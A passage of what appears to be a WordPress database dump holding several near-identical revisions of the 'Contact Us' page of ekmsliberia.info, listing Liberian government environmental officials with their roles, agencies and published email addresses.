https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:34:52','2021-01-22 10:34:52','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3410,42,'2021-01-22 10:35:17','2021-01-22 10:35:17','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><p><strong>Blamah Goll</strong><br />Conservation Manager FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:35:17','2021-01-22 10:35:17','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3411,42,'2021-01-22 10:35:17','2021-01-22 10:35:17','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><p><strong>Blamah Goll</strong><br />Conservation Manager FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:35:17','2021-01-22 10:35:17','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3412,42,'2021-01-22 10:35:17','2021-01-22 10:35:17','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><p><strong>Blamah Goll</strong><br />Conservation Manager FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><strong>Uriah Garsinii </strong>\nLand Use Management Manager </br>\nLLA\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br 